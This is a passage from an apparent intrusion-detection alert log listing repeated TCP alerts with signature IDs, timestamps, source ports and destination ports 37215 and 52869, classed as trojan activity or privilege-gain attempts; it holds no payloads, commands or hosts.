                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:49904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.269493
                      SID:2829579
                      Source Port:37096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2027339
                      Source Port:34784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.646553
                      SID:2027339
                      Source Port:54636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.960598
                      SID:2027339
                      Source Port:40488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176056
                      SID:2027339
                      Source Port:50156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.228937
                      SID:2025132
                      Source Port:41478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.551930
                      SID:2025132
                      Source Port:37128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.347952
                      SID:2831300
                      Source Port:53006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.432998
                      SID:2831300
                      Source Port:55840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2027339
                      Source Port:51926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.228618
                      SID:2027339
                      Source Port:39274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:16.958571
                      SID:2027339
                      Source Port:34588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.469824
                      SID:2025132
                      Source Port:46484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:10.600919
                      SID:2831300
                      Source Port:35416
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2025132
                      Source Port:39642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.180627
                      SID:2027339
                      Source Port:32976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.901932
                      SID:2025132
                      Source Port:49280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2027339
                      Source Port:60736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.226828
                      SID:2835222
                      Source Port:59126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472706
                      SID:2831300
                      Source Port:55180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.338927
                      SID:2835222
                      Source Port:52286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.258139
                      SID:2025132
                      Source Port:50684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.586481
                      SID:2025132
                      Source Port:55382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.062295
                      SID:2025132
                      Source Port:51174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2027339
                      Source Port:54868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.422821
                      SID:2025132
                      Source Port:45576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.047147
                      SID:2027339
                      Source Port:51010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.439088
                      SID:2027339
                      Source Port:37406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.994605
                      SID:2027339
                      Source Port:43014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.273631
                      SID:2027339
                      Source Port:33598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.587244
                      SID:2025132
                      Source Port:47624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.105390
                      SID:2027339
                      Source Port:44836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.371373
                      SID:2025132
                      Source Port:53832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.325929
                      SID:2027339
                      Source Port:42362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.027833
                      SID:2027339
                      Source Port:52714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.884095
                      SID:2025132
                      Source Port:39930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.526129
                      SID:2831300
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2829579
                      Source Port:49378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:42728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.318882
                      SID:2025132
                      Source Port:38064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:33.244498
                      SID:2025132
                      Source Port:40774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.898078
                      SID:2025132
                      Source Port:51714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.745204
                      SID:2025132
                      Source Port:36472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.838207
                      SID:2027339
                      Source Port:40042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.714340
                      SID:2025132
                      Source Port:52606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.977626
                      SID:2027339
                      Source Port:44902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.713445
                      SID:2027339
                      Source Port:46276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2829579
                      Source Port:37448
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.924564
                      SID:2025132
                      Source Port:44664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2027339
                      Source Port:47574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:47194
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2027339
                      Source Port:36426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.542034
                      SID:2835222
                      Source Port:32976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2027339
                      Source Port:40178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.716986
                      SID:2025132
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.244494
                      SID:2027339
                      Source Port:41488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.339081
                      SID:2027339
                      Source Port:43654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2027339
                      Source Port:49954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449942
                      SID:2831300
                      Source Port:58546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.619304
                      SID:2027339
                      Source Port:50438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.285994
                      SID:2835222
                      Source Port:51056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.400670
                      SID:2027339
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.442542
                      SID:2025132
                      Source Port:43822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:03.257276
                      SID:2025132
                      Source Port:34104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.775474
                      SID:2025132
                      Source Port:53522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.149825
                      SID:2027339
                      Source Port:35598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.442399
                      SID:2025132
                      Source Port:60674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2829579
                      Source Port:54782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133659
                      SID:2027339
                      Source Port:45948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.800280
                      SID:2027339
                      Source Port:45128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2829579
                      Source Port:58176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.233230
                      SID:2025132
                      Source Port:51020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.445836
                      SID:2831300
                      Source Port:58996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2835222
                      Source Port:56158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2027339
                      Source Port:42064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:45.487764
                      SID:2025132
                      Source Port:54820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.851986
                      SID:2027339
                      Source Port:55550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.457748
                      SID:2027339
                      Source Port:49252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574960
                      SID:2829579
                      Source Port:58594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2831300
                      Source Port:51086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:35396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.013470
                      SID:2025132
                      Source Port:58006
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.152960
                      SID:2027339
                      Source Port:37172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.132424
                      SID:2025132
                      Source Port:49380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.513130
                      SID:2025132
                      Source Port:36280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.809155
                      SID:2027339
                      Source Port:45764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.910197
                      SID:2025132
                      Source Port:44802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:26.204720
                      SID:2027339
                      Source Port:49340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.644841
                      SID:2835222
                      Source Port:57442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:37688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2027339
                      Source Port:37362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2025132
                      Source Port:35346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2835222
                      Source Port:40716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.813303
                      SID:2027339
                      Source Port:47876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2027339
                      Source Port:57214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.175557
                      SID:2025132
                      Source Port:59414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.187333
                      SID:2027339
                      Source Port:54036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:53692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2025132
                      Source Port:35642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2831300
                      Source Port:57458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.198650
                      SID:2025132
                      Source Port:39210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.252147
                      SID:2025132
                      Source Port:34226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2027339
                      Source Port:55484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2027339
                      Source Port:51432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.465013
                      SID:2831300
                      Source Port:48692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.497829
                      SID:2831300
                      Source Port:41718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:07.633025
                      SID:2831300
                      Source Port:56308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.464931
                      SID:2831300
                      Source Port:37702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.733116
                      SID:2027339
                      Source Port:40742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.334968
                      SID:2025132
                      Source Port:43234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.572805
                      SID:2027339
                      Source Port:33554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2025132
                      Source Port:45226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.557113
                      SID:2831300
                      Source Port:55190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2027339
                      Source Port:36160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:42.090394
                      SID:2831300
                      Source Port:49628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:55.981552
                      SID:2027339
                      Source Port:44010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.997034
                      SID:2025132
                      Source Port:45512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.592911
                      SID:2027339
                      Source Port:36374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2025132
                      Source Port:39532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:57706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2027339
                      Source Port:51960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.631218
                      SID:2025132
                      Source Port:41878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2831300
                      Source Port:43090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.625707
                      SID:2829579
                      Source Port:51850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.306429
                      SID:2025132
                      Source Port:48540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:41594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.963175
                      SID:2027339
                      Source Port:44422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2027339
                      Source Port:43808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.911568
                      SID:2025132
                      Source Port:59022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.735784
                      SID:2027339
                      Source Port:57692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.617831
                      SID:2027339
                      Source Port:48978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.532921
                      SID:2835222
                      Source Port:56722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2027339
                      Source Port:47302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.798839
                      SID:2025132
                      Source Port:48820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2027339
                      Source Port:48090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.295861
                      SID:2027339
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.027910
                      SID:2027339
                      Source Port:53256
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2829579
                      Source Port:51688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.755424
                      SID:2027339
                      Source Port:55666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2027339
                      Source Port:46164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2835222
                      Source Port:35500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.692241
                      SID:2027339
                      Source Port:53950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.582686
                      SID:2027339
                      Source Port:50050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.458829
                      SID:2027339
                      Source Port:45848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.454514
                      SID:2027339
                      Source Port:41976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.979529
                      SID:2027339
                      Source Port:55536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:39228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2027339
                      Source Port:48164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.930252
                      SID:2027339
                      Source Port:47188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2829579
                      Source Port:60348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.836795
                      SID:2027339
                      Source Port:49868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2025132
                      Source Port:49392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.540965
                      SID:2025132
                      Source Port:53790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.071790
                      SID:2025132
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2025132
                      Source Port:40120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:31.147829
                      SID:2831300
                      Source Port:48326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2829579
                      Source Port:40924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662338
                      SID:2835222
                      Source Port:55138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.556359
                      SID:2027339
                      Source Port:56220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472705
                      SID:2027339
                      Source Port:33694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.313457
                      SID:2027339
                      Source Port:54190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797833
                      SID:2025132
                      Source Port:57418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2835222
                      Source Port:59708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2025132
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.449442
                      SID:2027339
                      Source Port:42894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.526128
                      SID:2831300
                      Source Port:47970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.958012
                      SID:2027339
                      Source Port:57782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.208694
                      SID:2831300
                      Source Port:34510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.375806
                      SID:2027339
                      Source Port:59334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.800446
                      SID:2835222
                      Source Port:47068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.139895
                      SID:2027339
                      Source Port:47894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.790631
                      SID:2025132
                      Source Port:36502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.326250
                      SID:2831300
                      Source Port:48094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2829579
                      Source Port:46914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.320378
                      SID:2027339
                      Source Port:44732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.405141
                      SID:2027339
                      Source Port:33496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:48.772924
                      SID:2027339
                      Source Port:49468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.672304
                      SID:2835222
                      Source Port:40378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:40564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
